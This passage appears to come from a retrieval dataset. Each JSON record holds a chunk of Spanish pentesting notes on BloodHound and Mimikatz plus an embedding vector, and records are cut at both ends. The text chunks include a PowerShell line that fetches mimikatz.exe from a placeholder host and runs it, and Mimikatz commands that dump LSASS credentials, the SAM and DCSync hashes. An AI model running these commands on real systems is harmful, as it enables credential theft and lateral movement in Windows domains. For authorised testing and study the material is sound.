-0.02191, -0.08244, 0.04405, -0.00407, -0.02198, -0.05906, 0.02961, -0.00397, -0.05338, -0.05011, 0.09347, 0.04359, 0.00756, 0.06188, -0.01418, -0.00286, -0.0186, 0.06059, 0.03015, -0.04796, -0.00671, 0.02233, -0.01199, -0.0166, 0.0557, 0.08739, -0.0182, 0.0473, 0.00902, 0.01898, -0.07405, 0.00648, 0.03015, -0.0484, -0.00338, -0.02646, 0.03747, 0.00661, 0.03235, -0.04643, 0.10081, -0.06404, 0.0274, -0.00147, -0.05038, 0.00218, 0.0019, -0.02375, 0.01493, -2e-05, -0.07826, 0.05727, -0.05529, -0.04508, 0.02768, 0.03813, -0.01211, -0.03926, 0.02356, 0.01692, -0.0221, 0.04165, 0.01076, 0.01577, -0.03221, 0.01598, 0.08184, 0.03009, -0.00499, -0.00525, 0.00314, 0.05146, -0.00435, -0.03741, -0.00756, -0.02091, 0.00771, -0.01075, -0.00382, 0.02963, 0.04055, -0.0325, 0.00671, -0.09294, 0.03554, -0.0301, 0.02967, 0.00781, -0.0284, 0.00928, -0.06622, 0.01925, 0.01084, 0.0028, 0.0117, -0.03605, 0.01738, -0.0044, 0.02375, -0.05937, 0.01977, 0.00789, -0.04246, 0.07193, -0.05243, -0.01038, 0.07651, -0.0355, -0.02366, -0.02649, 0.01886, -0.00014, 0.02627, -0.02432, 0.01322, 0.05612, 0.01897, -0.0264, -0.09453, -0.00557, -0.04867, 0.00295, 0.0081, 0.04876, -0.00013, -0.01639, 0.02786, 0.03989, 0.00291, 0.00061, -0.02422]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "## Instalación (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "v": [-0.07621, -0.09906, -0.13568, -0.10512, 0.01232, -0.08902, -0.13536, -0.1825, -0.092, 0.10264, -0.08953, -0.08646, -0.06426, -0.07361, -0.13348, -0.11306, -0.15373, -0.07492, 0.01825, 0.07351, -0.08247, 0.08406, -0.04205, 0.03734, -0.03215, 0.14692, 0.04539, 0.10788, -0.1017, -0.03696, -0.03384, -0.09432, 0.0662, -0.02079, -0.11339, -0.0472, -0.02842, 0.02528, -0.07138, 0.2517, -0.04887, 0.01156, -0.01113, 0.10713, 0.01253, -0.03802, -0.02961, -0.03286, 0.12582, -0.0365, 0.07928, -0.00502, -0.17768, -0.11538, -0.00915, -0.05186, 0.15526, -0.06141, -0.01272, -0.09799, -0.12597, -0.03067, 0.08629, 0.06774, 0.00013, -0.04105, -0.04167, -0.08381, -0.05597, 0.09769, -0.02647, 0.02617, -0.07535, 0.01721, -0.0019, -0.00091, 0.03226, -0.04954, 0.06292, -0.00404, -0.05479, -0.01597, 0.03597, -0.01544, -0.12194, -0.07083, 0.04486, -0.01241, -0.00617, 0.06617, 0.07123, -0.10199, 0.03925, 0.0093, 0.06469, -0.03055, 0.00514, 0.01941, 0.03989, -0.06243, -0.03786, 0.08371, -0.02673, 0.14092, 0.101, -0.09448, -0.05002, -0.04243, 0.01443, -0.06899, 0.05328, 0.03515, -0.03624, -0.01802, -0.03702, -0.04552, 0.02983, 0.04034, 0.01134, -0.05982, -0.07568, -0.05448, 0.00345, 0.0362, -0.0961, -0.03442, -0.04685, 0.08696, -0.01828, -0.03132, 0.01972, 0.01404, 0.00777, 0.04691, -0.14054, 0.0799, 0.01701, -0.03868, -0.00759, -0.06554, -0.03621, 0.00686, 0.05957, -0.02749, 0.05223, 0.05766, 0.01169, -0.08566, -0.01894, 0.05358, 0.04203, 0.03381, -0.01845, -0.0056, -0.07751, -0.00474, 0.03581, -0.03796, 0.03259, 0.00017, 0.00833, -0.01573, -0.02557, 0.05412, -0.15381, 0.0397, -0.0658, -0.01425, 0.00545, -0.0082, -0.00663, -0.00403, -0.00045, 0.00164, 0.00108, -0.05262, 0.04058, -0.09501, 0.01611, 0.00074, -0.00292, 0.00215, -0.01835, -0.01841, -0.01005, -0.01559, -0.01595, -0.03236, 0.00549, 0.00964, 0.07428, 0.06229, 0.01318, -0.00964, -0.01737, 0.02807, -0.01375, -0.09205, -0.03381, 0.02747, -0.04681, 0.0464, -0.02658, -0.03603, 0.00136, -0.00164, -0.02732, 0.05094, -0.0911, 0.09096, 0.04071, -0.02566, 0.03153, -0.0164, -0.03968, -0.08088, 0.04128, 0.00842, -0.03755, -0.01779, 0.02696, 0.04017, 0.01825, -0.00495, -0.08212, -0.05816, 0.02834, -0.03823, 0.10535, -0.05724, -0.0683, 0.04311, -0.0101, -0.04556, 0.00451, -0.00474, 0.00855, 0.00385, -0.00719, 0.00735, 0.08811, 0.077, -0.04251, -0.1236, -0.04467, -0.05042, -0.014, 0.01465, 0.05089, 0.02475, 0.00325, 0.03056, 0.03746, 0.0199, -0.01749, 0.00134]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "# 1) recolectar desde Kali (necesitas creds válidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "v": [0.07125, -0.27544, 0.0301, 0.02804, 0.02381, -0.1345, 0.04664, 0.05636, -0.06378, -0.04855, -0.07281, -0.08773, 0.01822, -0.07439, -0.0969, -0.06895, -0.07804, -0.00526, -0.0217, 0.02432, -0.09206, -0.08992, -0.02568, 0.00899, 0.04256, 0.18111, 0.03511, -0.01251, -0.02068, -0.04092, 0.0124, -0.04685, -0.0837, -0.02039, -0.02776, 0.11772, 0.0066, 0.14168, -0.05096, 0.09934, -0.10504, 0.13034, 0.03548, 0.0568, -0.02098, 0.05501, 0.04065, 0.14443, 0.00566, -0.04713, -0.02997, -0.06275, -0.17318, -0.09751, -0.05736, 0.03366, 0.08026, 0.03658, 0.05203, -0.03066, 0.04975, -0.00144, -0.00233, 0.01184, 0.02975, -0.05319, 0.08915, -0.07795, -0.00607, 0.01945, -0.02421, 0.00604, 0.0619, 0.01389, 0.01094, -0.05649, 0.0613, -0.15629, 0.08728, 0.08269, 0.03202, -0.01051, 0.05388, -0.07949, -0.061, -0.06296, 0.05277, 0.01245, 0.1322, -0.01734, -0.01567, -0.13381, 0.01305, 0.10936, 0.00603, -0.0273, -0.06548, 0.02173, -0.03432, 0.11178, 0.00933, -0.08266, -0.08678, 0.06171, -0.0218, 0.01999, -0.01936, 0.04623, 0.03167, 0.01282, 0.0867, -0.08637, -0.10333, 0.03934, -0.04462, -0.03836, -0.064, -0.04023, 0.03002, 0.02201, 0.01148, 0.03528, 0.02432, -0.07061, -0.04646, -0.0432, -0.05439, -0.00465, 0.00569, -0.08458, -0.08011, 0.09786, 0.0143, 0.0079, -0.00734, 0.03961, 0.05732, -0.01939, -0.01893, -0.06474, -0.06356, -0.01112, 0.04194, -0.05, 0.03359, 0.04697, 0.03149, -0.02889, -0.14207, 0.02729, 0.04996, -0.00674, 0.02569, -0.00757, -0.04419, 0.05166, 0.01033, 0.0056, -0.02549, 0.02599, 0.0329, 0.03314, 0.04802, -0.03572, -0.06108, 0.09896, 0.0291, 0.01915, 0.04867, -0.08429, 0.00894, -0.00537, -0.05552, -0.00606, -0.02916, 0.01095, 0.16107, -0.08478, -0.09671, -0.02219, 0.04331, -0.07859, -0.00989, 0.03453, 0.06358, 0.01062, -0.01578, 0.06497, -0.01002, -0.07346, -0.02478, -0.02942, 0.0489, 0.05276, -0.0412, -0.01142, 0.0724, 0.02674, 0.04157, 0.04113, 0.0182, 0.00833, 0.0029, -0.03574, 0.08361, -0.0427, 0.04596, 0.03669, 0.00185, 0.04414, 0.01307, 0.01692, -0.04178, -0.05471, -0.02342, -0.17255, -0.0184, -0.00064, 0.01629, 0.00151, 0.05039, -0.00302, 0.03944, 0.08921, -0.03515, -0.03359, 0.04853, 0.01722, 0.12135, 0.00559, -0.04613, 0.09446, -0.06115, -0.01493, -0.02734, 0.01965, 0.01994, -0.0032, -0.07042, -0.03108, -0.0835, 0.10195, 0.00265, -0.09404, -0.05809, 0.01658, 0.04301, 0.02415, -0.04362, -0.05387, -0.02222, -0.08963, -0.0056, -0.10986, 0.09313, 0.10443]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "# 2) lanzar GUI y arrastrar los .json\nbloodhound # login neo4j / BloodHound1!\n```", "v": [-0.23713, -0.10416, -0.00984, -0.08125, -0.02539, -0.04428, -0.15271, -0.01523, 0.08932, 0.0377, -0.10492, -0.15184, 0.00477, 0.07931, -0.06489, -0.03809, -0.09446, 0.06281, -0.06071, 0.07199, -0.12591, 0.12477, -0.04049, -0.06145, 0.00676, 0.03015, 0.07172, 0.06763, -0.075, 0.00958, -0.10524, -0.18256, 0.04961, -0.00384, -0.13725, -0.04742, -0.06262, 0.10065, -0.07287, 0.22278, -0.03125, 0.01123, -0.01613, -0.03642, -0.01817, 0.01424, 0.03569, 0.06597, 0.08607, 0.01263, 0.07166, 0.10233, -0.15922, -0.00509, -0.05212, -0.04861, 0.10122, -0.07522, -0.03307, -0.10707, -0.04525, -0.0566, 0.03447, -0.03976, -0.03788, -0.03901, 0.04459, -0.08994, 0.00774, 0.12874, 0.02493, 0.03221, -0.03171, 0.0334, -0.07501, -0.06143, 0.04377, -0.00913, 0.1355, 0.06647, -0.02664, -0.00159, 0.0237, 0.02248, 0.04867, 0.01049, 0.073, -0.02504, -0.01355, 0.09008, 0.07591, -0.11989, -0.00751, -0.01174, 0.02247, -0.03692, 0.00702, -0.04071, 0.10314, -0.05024, 0.01828, 0.02056, -0.16147, 0.10615, 0.14453, -0.02318, -0.05406, -0.0946, -0.04985, -0.04184, 0.04877, -0.00597, -0.07926, 0.04959, -0.04384, -0.02486, 0.05432, 0.02025, 0.0599, 0.0323, -0.03181, -0.05277, 0.00276, 0.0779, -0.13411, -0.00758, -0.09783, 0.04629, 0.01733, -0.05845, -0.01433, 0.06502, 0.00116, 0.00548, -0.14926, 0.07711, 0.05934, -0.05042, 0.02505, -0.04614, -0.04611, 0.03603, 0.06134, -0.01905, 0.02272, 0.00163, 0.04014, -0.07456, -0.04977, 0.02982, 0.04409, -0.01298, -0.00438, -0.00259, -0.02118, -0.05572, 0.00642, 0.02722, -0.01874, -0.04341, -0.06414, 0.02762, 0.00585, 0.03068, -0.10025, 0.12605, -0.06892, -0.01373, -0.00997, -0.01323, 0.0092, -0.0322, 0.03613, 0.02469, 0.00925, -0.05696, 0.06549, -0.06006, -0.02214, 0.02622, 0.03446, 0.0021, -0.01203, 0.00069, 0.01326, -0.07366, 0.01036, -0.02969, 0.04637, 0.03138, 0.05729, 0.0855, 0.09628, 0.0092, -0.02556, 0.00241, 0.09024, -0.0734, 0.00521, 0.00368, -0.01084, -0.00201, -0.02675, 0.00469, 0.02009, 0.05726, -0.05778, 0.02825, -0.07988, 0.02143, -0.00712, -0.03232, 0.05177, -0.00069, -0.01161, -0.02914, -0.01946, 0.03017, -0.0195, -0.00753, 0.00268, 0.02885, -0.00286, 0.02815, -0.05376, 0.05164, 0.03395, -0.01928, 0.11593, -0.02799, -0.04589, 0.06962, -0.01624, -0.02074, -0.02291, 0.05326, 0.04569, -0.00308, -0.01841, -0.03092, 0.09051, 0.04565, -0.04937, -0.09389, -0.02717, -0.09294, -0.02839, 0.04021, 0.07648, -0.01303, -0.01861, -0.01579, 0.0575, 0.00764, 0.02637, 0.00415]} +{"tipo": "metodologia", "herramienta": "BloodHound", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "texto": "## Queries que importan\n- **Find Shortest Paths to Domain Admins**\n- **Find Kerberoastable Accounts** → Kerberoasting\n- **Find AS-REP Roastable Users** → AS-REP Roasting\n- Aristas peligrosas (`GenericAll`, `WriteDACL`, `ForceChangePassword`) → ACL abuses\n\nRelacionado: Mimikatz · Movimiento lateral · OSCP MOC", "v": [-0.30105, -0.11226, 0.19118, -0.20386, 0.02481, -0.0679, 0.04346, 0.1017, -0.13907, 0.15069, -0.01239, -0.20888, -0.04763, -0.07387, 0.28418, -0.05234, -0.05664, 0.01977, -0.04013, 0.0872, 0.05036, -0.07209, -0.13134, 0.09367, 0.09756, 0.13696, -0.00234, -0.09582, 0.01061, 0.00334, -0.00721, -0.00284, -0.05428, 0.09104, -0.05618, -0.06738, 0.00426, -0.00344, 0.1123, 0.21071, 0.04744, 0.09287, -0.15316, 0.12958, 0.06134, 0.00672, 0.02269, 0.00457, 0.02287, 0.05614, 0.01278, -0.07842, -0.05628, -0.00156, 0.05696, -0.00415, 0.08699, 0.02007, -0.1445, -0.0113, -0.00141, -0.02256, -0.03613, -0.04387, 0.06083, -0.04046, -0.0035, -0.05014, -0.04825, 0.00175, -0.08736, 0.08814, 0.05555, -0.05952, 0.02519, -0.05946, 0.09863, -0.04575, 0.13668, 0.06325, -0.02208, -0.0814, -0.04457, 0.05662, 0.04188, -0.04737, 0.08619, -0.07694, 0.01611, -0.04594, 0.09074, -0.06753, 0.03225, 0.03743, 0.00991, -0.02969, -0.08154, -0.02418, -0.08971, -0.06534, -0.06104, 0.10597, 0.02744, -0.00574, -0.00271, 0.01584, -0.0016, -0.02181, 0.11756, -0.02579, 0.08473, -0.031, 0.0441, -0.00473, 0.00897, 0.12223, -0.02119, -0.00216, 0.05048, 0.0183, 0.03324, 0.01959, -0.00617, 0.01248, -0.02378, 0.00972, 0.02463, 0.04593, -0.04307, -0.01444, 0.03319, -0.06135, -0.05354, -0.01382, -0.02345, -0.03974, 0.01943, -0.01692, 0.03645, -0.01134, -0.02728, -0.00044, -0.01118, 0.05596, 0.0064, 0.00787, 0.05334, 0.03659, 0.05592, 0.02686, 0.01203, 0.0331, -0.01489, -0.00442, 0.01398, -0.00161, 0.00081, 0.01427, -0.09093, 0.01174, 0.01331, 0.03508, 0.05723, -0.02832, 0.03512, 0.05494, 0.05452, 0.01926, -0.01188, -0.04642, -0.00325, 0.00094, -0.02174, 0.0099, -0.03957, -0.02689, 0.0738, -0.03352, -0.01791, -0.04781, 0.02421, -0.064, 0.06224, 0.05249, -0.04041, -0.01873, 0.0355, 0.01408, 0.01872, -0.02549, 0.00672, -0.01539, 0.04384, -0.03823, -0.04176, -0.00492, 0.03678, -0.04078, -0.05084, -0.02588, -0.01443, -0.01212, -0.0138, -0.0318, 0.06156, -0.0508, 0.04787, -0.01293, -0.0215, -0.03861, -0.0321, 0.02255, 0.02828, -0.0331, -0.02059, 0.01149, 0.00322, 0.0077, -0.0051, -0.00967, -0.02398, 0.02516, 0.03652, 0.02545, 0.03836, 0.04972, -0.02807, -0.04765, -0.03418, -0.02577, 0.04137, -0.00632, -0.01781, -0.06064, -0.03755, -0.04666, -0.09108, 0.01318, 0.03612, 0.04641, -0.01013, -0.04208, 0.04402, 0.00082, -0.04335, -0.04083, -0.00435, -0.02786, -0.00463, 0.02698, 0.0212, -0.02751, -0.0371, -0.04446, 0.02364, -0.02857]} +{"tipo": "metodologia", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "texto": "# Mimikatz\n\n> Un **.exe que corre DENTRO de la víctima Windows** (no en Kali). Lee la memoria de **LSASS** y vuelca credenciales. En `tu carpeta`.", "v": [-0.24833, -0.12888, -0.14954, 0.07394, -0.04462, -0.08467, -0.09396, 0.09869, -0.06496, -0.0279, -0.03312, -0.12438, -0.0505, -0.02284, 0.07444, -0.0157, 0.05225, 0.02404, 0.05313, -0.09572, -0.06079, -0.05381, -0.04923, 0.1153, -0.04668, 0.13894, 0.05507, -0.00507, 0.02929, 0.00905, -0.00253, 0.05199, -0.08379, -0.01682, 0.1789, -0.01924, -0.13509, 0.01053, 0.12927, 0.18191, 0.22789, 0.19813, -0.06722, 0.0407, 0.11164, -0.14374, 0.08799, 0.03214, 0.05745, -0.05157, -0.05819, -0.01755, -0.0246, -0.06428, 0.08076, -0.04002, 0.0357, 0.0238, -0.00234, 0.02071, 0.02052, -0.06167, -0.0464, 0.05011, 0.06271, 0.00023, 0.15989, -0.03322, -0.08859, 0.06314, -0.05521, 0.04205, 0.07487, -0.14335, -0.00497, -0.04576, -0.00775, -0.07088, 0.09062, 0.03233, 0.01761, -0.02827, -0.07994, -0.00116, 0.01866, 0.00139, -0.01306, -0.0289, -0.0528, -0.02721, 0.06638, 0.02122, -0.06549, 0.14153, 0.05924, -0.04396, 0.00246, 0.06037, 0.02626, 0.15721, 0.02836, -0.04918, -0.04138, 0.13175, 0.06308, -0.00192, 0.0045, 0.04753, -0.06649, -0.08615, 0.06661, 0.00093, -0.05158, -0.01754, -0.07968, -0.05988, 0.02042, -0.00766, 0.03724, 0.0051, 0.04898, -0.03819, 0.0117, -0.00198, -0.05153, -0.09208, -0.1532, 0.04596, -0.08562, 0.03693, -0.02876, 0.02227, 0.00706, -0.08991, 0.04103, 0.0073, 0.0205, 0.03488, 0.03339, 0.01093, 0.10622, -0.00912, 0.01689, 0.00457, -0.05666, 0.0489, 0.01625, 0.01335, -0.00862, 0.00169, 0.11843, 0.06278, 0.00906, 0.00976, 0.00075, -0.03525, 0.0456, 0.02841, 0.01787, -0.00221, -0.01739, 0.0247, 0.01568, 0.08813, -0.04339, -0.02709, 0.04557, -0.03904, 0.05548, -0.00969, -0.02081, -0.01883, -0.07328, 0.00368, -0.0035, -0.10014, 0.02871, -0.04609, -0.04175, -0.02605, -0.00156, -0.01435, 0.02479, 0.03574, -0.05942, -0.05056, -0.01593, 0.0275, -0.04191, -0.02561, -0.01908, -0.00485, 0.03611, -0.01446, 0.0063, -0.01509, -0.05329, -0.03058, 0.00677, 0.01531, -0.11431, 0.03486, -0.02014, -0.02828, 0.10257, 0.04843, -0.01337, 0.0403, -0.02275, 0.0184, 0.01087, 0.01931, 0.02441, -0.04144, -0.04471, -0.08873, 0.05342, 0.01862, 0.03352, -0.02077, -0.00118, -0.01463, 0.05656, -0.02899, -0.04051, -0.02233, -0.01727, -0.01104, -0.02746, -0.03817, -0.02395, 0.05422, 0.00135, -0.08409, 0.03799, 0.00153, -0.03733, -0.02854, -0.04556, -0.01375, -0.02762, 0.01504, -0.04286, -0.06892, -0.02499, -0.05052, -0.01008, 0.05417, 0.02175, -0.04783, -0.00729, -0.02654, 0.00698, -0.08721, 0.00292, -0.05545]} +{"tipo": "metodologia", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "texto": "## Subir y ejecutar\n```powershell\niwr http://TU_IP/mimikatz/x64/mimikatz.exe -OutFile C:\\Windows\\Temp\\m.exe # Transferencia de ficheros\nC:\\Windows\\Temp\\m.exe\n```", "v": [-0.05292, -0.04505, -0.09061, -0.08821, 0.13938, -0.07214, -0.12188, 0.0476, 0.08205, -0.04182, 5e-05, 0.0625, 0.03384, -0.0152, -0.0025, -0.03466, 0.07379, -0.02588, 0.09404, -0.08297, 0.12132, 0.03533, -0.0741, -0.02436, 0.07073, 0.18675, -0.13177, 0.00613, -0.10007, -0.1031, 0.04169, 0.02833, 0.08228, -0.09419, 0.05491, 0.06986, -0.05818, -0.04257, 0.06546, 0.14706, 0.03991, 0.14091, -0.18225, 0.14274, 0.04479, -0.08637, 0.0936, -0.01242, 0.1518, -0.03752, 0.00056, -0.09429, -0.0488, -0.01088, 0.04859, -0.09811, 0.13887, -0.07256, -0.0068, 0.02673, -0.01846, 0.13089, -0.04209, 0.00632, 0.08527, -0.00243, 0.05975, -0.12097, -0.07364, 0.08641, -0.1104, 0.02928, -0.0016, -0.04107, 0.034, -0.10899, -0.09232, -0.13185, 0.11217, -0.01113, -0.05424, 0.07658, -0.05427, -0.07704, -0.06589, -0.08282, 0.03316, -0.1387, -0.01664, -0.0299, 0.09703, -0.0543, -0.02625, 0.08528, 0.05812, -0.11235, -0.03197, 0.00758, 0.06962, 0.06849, -0.00256, 0.00502, -0.12, 0.10969, -0.01478, 0.06859, -0.03582, -0.04662, -0.01683, 0.00579, 0.04415, 0.03842, 0.032, -0.02023, -0.01066, -0.02992, -0.05606, -0.044, 0.00289, 0.00867, -0.0454, -0.03902, -0.03605, 0.00159, -0.07172, -0.10636, -0.07208, 0.07594, -0.08774, 0.00706, 0.00708, -0.02821, 0.02395, -0.03467, -0.02481, 0.02842, 0.04398, 0.02512, 0.03906, -0.09232, 0.11176, 0.04015, 0.02522, 0.08451, 0.07422, 0.01425, 0.06515, -0.01303, 0.00092, -0.03877, 0.15522, 0.00311, -0.00792, 0.07375, -0.00786, -0.01937, -0.00617, 0.10193, 0.02692, -0.07855, 0.03029, 0.04344, 0.0334, 0.00698, 0.01485, 0.02625, -0.03357, 0.03402, 0.05991, 0.01024, -0.03599, 0.03871, -0.00985, -0.05278, 0.01508, -0.03952, 0.02025, -0.05718, 0.0322, -0.04631, -0.02492, -0.02756, 0.10219, 0.02067, -0.0344, -0.00471, -0.00028, 0.00866, -0.06861, 0.0064, -0.03179, -0.00503, -0.04026, -0.09259, 0.00327, -0.05876, 0.00539, -0.05063, 0.06224, -0.00234, -0.03653, -0.04013, -0.00533, -0.05889, 0.06508, 0.0588, -0.04799, 0.01161, -0.01505, 0.02994, 0.03338, 0.0199, 0.05555, -0.02829, -0.00059, -0.00659, 0.03767, -0.0043, 0.0157, -0.04652, -0.0386, 0.02124, 0.10015, 0.00053, -0.00359, 0.01839, 0.03061, -0.00826, 0.00164, 0.05161, -0.05606, 0.05279, 0.01116, -0.04538, 0.07464, -0.01357, -0.00533, -0.09968, -0.02763, -0.06088, -0.01113, 0.03462, -0.04859, -0.08161, -0.07453, -0.04677, -0.04117, 0.04346, 0.07245, -0.06579, 0.00249, -0.03585, 0.02662, -0.02736, -0.03987, -0.01569]} +{"tipo": "metodologia", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "texto": "## Comandos clave (dentro de mimikatz)\n```\nprivilege::debug # imprescindible primero\nsekurlsa::logonpasswords # hashes NTLM, tickets, a veces pass en claro (wdigest)\nlsadump::sam # SAM local\nlsadump::dcsync /user:Administrator # DCSync (si tienes permisos de replicación)\n```", "v": [0.01646, -0.09199, -0.15344, -0.18015, -0.03668, -0.22276, -0.22385, 0.09259, -0.06291, 0.20522, -0.03218, -0.10392, -0.03722, -0.14216, -0.01335, -0.00341, 0.05371, -0.0058, -0.03899, -0.00488, 0.05862, -0.01338, -0.14851, -0.01305, 0.13275, -0.04869, 0.06684, 0.00625, -0.10332, -0.02666, 0.00579, 0.01136, -0.03138, 0.0498, 0.03726, -0.01725, -0.01516, 0.04734, 0.06141, 0.23541, 0.00833, 0.12085, -0.18268, 0.09569, 0.01529, -0.1589, 0.0082, -0.00028, 0.06107, -0.19124, -0.13897, 0.01828, -0.07737, -0.07604, 0.02093, -0.03695, 0.0528, 0.01124, 0.00517, 0.02282, -0.08529, 0.05717, 0.00652, -0.00853, 0.03599, 0.03218, 0.12337, -0.13041, 0.0028, 0.16379, -0.15513, 0.01173, 0.08059, -0.08451, 0.09014, -0.06175, 0.06101, -0.05728, 0.15436, 0.08672, 0.04929, -0.05593, -0.00314, -0.03331, -0.00419, -0.04734, 0.04831, 0.0192, -0.01546, 0.05765, 0.09233, 0.0427, 0.06836, -0.03072, 0.05671, -0.08289, -0.03777, 0.02592, 0.04652, 0.02684, 0.00722, -0.02075, -0.04971, 0.12652, -0.06365, 0.0055, 0.07875, -0.04525, -0.01926, 0.0445, 0.11288, -0.01808, -0.03631, 0.00443, -0.04383, 0.01399, -0.01537, -0.02973, -0.00161, 0.02381, 0.01057, -0.03487, 0.05128, -0.06904, -0.00399, 0.00829, -0.01835, 0.06178, -0.04673, 0.00236, -0.00105, 0.00036, 0.03121, -0.01291, 0.03544, 0.0118, 0.01243, -0.04664, -0.07537, -0.01968, 0.01781, -0.00678, 0.02591, 0.09548, 0.08077, 0.07343, -0.00076, -0.08687, -0.10048, -0.00963, 0.07442, 0.0338, -0.00208, 0.01633, 0.01747, 0.05745, 0.01184, -0.03306, -0.05543, -0.02387, -0.00555, 0.0366, 0.03122, 0.02917, -0.00797, -0.04589, -0.03297, -0.08157, 0.0084, -0.04806, 0.02127, -0.00488, 0.03437, -0.05305, 0.00295, -0.03741, 0.01061, -0.05794, -0.03927, -0.04935, 0.07057, -0.00565, 0.00973, 0.01589, 0.04132, -0.04219, -0.02131, 0.01673, 0.0032, 0.03763, 0.03208, -0.01474, -0.00609, 0.00838, 0.04704, -0.01238, -0.02013, -0.00555, -0.0555, -0.02743, 0.0036, -0.009, 0.00861, -0.00532, 0.0096, 0.00354, -0.021, 0.02538, 0.00454, -0.01769, 0.10079, -0.01548, 0.03082, -0.00637, -0.04073, -0.0371, -0.04517, 0.02112, -0.01512, -0.05621, 0.02236, 0.03053, 0.03069, 0.04341, 0.02438, 0.01286, 0.02514, 0.01884, 0.08032, 0.08466, -0.0002, 0.05757, -0.02749, -0.04354, 0.05236, -0.03844, -0.00978, -0.0164, -0.00127, -0.05925, 0.03075, -0.00036, 0.00105, -0.00472, -0.02376, 0.00429, -0.02983, 0.02251, -0.00586, 0.0014, 0.03401, -0.07241, -0.00086, -0.00226, -0.02044, -0.01089]} +{"tipo": "metodologia", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "texto": "## Requisito\nNecesitas ser **admin/SYSTEM** en la máquina (Privesc Windows / Potato attacks).", "v": [-0.27857, -0.17836, 0.0264, -0.28678, 0.15368, -0.10733, -0.10062, -0.18769, 0.02772, -0.04251, -0.09198, -0.00423, 0.0522, -0.01183, -0.02747, 0.07949, -0.01992, -0.0418, 0.00973, 0.09441, 0.03873, -0.00508, -0.06538, -0.05407, 0.12621, 0.14552, 0.02597, 0.03867, -0.21941, 0.01318, 0.01381, 0.02272, -0.0222, -0.09308, 0.05921, -0.07233, 0.013, 0.03401, 0.04097, 0.13787, 0.05886, 0.13591, -0.06575, 0.09486, 0.17237, -0.03464, 0.09972, -0.0392, 0.04255, -0.03534, -0.11484, 0.00641, -0.0639, -0.08161, 0.08334, -0.05399, 0.00092, 0.00084, 0.02176, 0.0522, -0.07047, 0.07422, -0.03995, 0.0147, -0.00113, 0.01448, 0.03952, -0.06992, 0.02992, 0.14931, -0.06086, -0.0498, 0.03568, -0.03282, 0.06209, 0.06577, 0.00054, 0.03879, 0.06108, -0.04535, -0.07372, 0.00875, -0.00427, -0.0675, 0.0031, -0.07295, 0.00791, -0.03229, -0.00533, -0.08323, 0.12489, -0.00701, -0.07948, 0.07816, 0.08561, -0.00041, -0.06171, -0.05398, -0.01863, 0.04806, 0.01289, -0.0808, 0.00864, 0.07147, -0.02347, 0.01816, -0.00042, -0.06208, 0.04273, -0.09376, 0.01751, 0.02054, -0.00056, -0.0391, -0.06217, -0.07896, -0.01784, 0.06492, 0.01139, 0.01718, -0.03311, 0.05331, 0.02254, -0.01413, 0.05786, -0.05149, -0.01009, 0.0603, -0.10712, -0.01133, 0.08567, -0.0191, -0.00378, 0.05161, -0.09855, 0.10263, 0.06116, -0.07179, 0.00635, -0.05189, 0.05755, 0.11944, 0.03723, -0.06676, 0.07591, 0.05868, 0.04884, -0.05118, -0.03648, -0.03556, 0.03822, 0.01317, 0.00301, 0.04797, -0.04984, 0.00213, 0.0178, -0.02712, -0.00471, -0.01113, 0.04467, 0.00092, -0.0737, -0.02561, -0.07133, 0.01292, -0.00527, -0.06792, 0.05075, -0.03614, -0.0667, -0.05316, -0.06205, -0.03328, -0.05124, 0.00662, 0.00985, -0.07086, -0.01319, 0.01943, -0.05677, -0.00434, 0.01917, -0.027, 4e-05, 0.02411, 0.01716, -0.00345, 0.01593, -0.00337, 0.02988, -0.00122, 0.05999, 0.03112, 0.0238, 0.07452, -0.10525, -0.03732, 0.00927, -0.00836, 0.00426, 0.01976, -0.10908, -0.04431, 0.01144, 0.06845, -0.00646, -0.06994, 0.00125, 0.01354, 0.05279, -0.0009, -0.01606, -0.02183, -0.04236, -0.08849, 0.01834, 0.02312, -0.01205, -0.00489, 0.01749, 0.01794, 0.02826, 0.04007, 0.02166, -0.01819, 0.00222, 0.02353, 0.01242, 0.00112, -0.03788, -0.01123, 0.02727, -0.03723, 0.00788, 0.01191, 0.04004, -0.01534, -0.01514, -0.00715, 0.00025, 0.04723, 0.03859, -0.06198, -0.0488, -0.0324, 0.02609, -0.01209, -0.02386, -0.04748, -0.01167, -0.0303, -0.0588, -0.05889, -0.03506, 0.01906]} +{"tipo": "metodologia", "herramienta": "Mimikatz", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Mimikatz.md", "texto": "## Después\n- Hash NTLM → Pass-the-Hash / Impacket → Movimiento lateral.\n- Pregúntale a BloodHound qué hacer con ese usuario.\n\nRelacionado: Kerberos · secretsdump · OSCP MOC", "v": [-0.39292, -0.17533, 0.11441, -0.04782, -0.12207, -0.12842, -0.10428, 0.13584, -0.04917, 0.07733, -0.04641, 0.07708, 0.1415, 0.02839, -0.02584, 0.09611, 0.01938, -0.02046, -0.00606, 0.01396, -0.02012, 0.06036, -0.15533, -0.01996, 0.01648, -0.0023, -0.01108, 0.09866, -0.10553, -0.06756, -0.12518, -0.02111, -0.08786, 0.05468, -0.07405, -0.05452, -0.05139, 0.01506, 0.06761, 0.21467, 0.07042, 0.16925, -0.08048, 0.10369, 0.11236, -0.08808, 0.01175, -0.01, 0.03391, -0.05666, 0.03076, 0.00295, -0.20021, -0.06915, 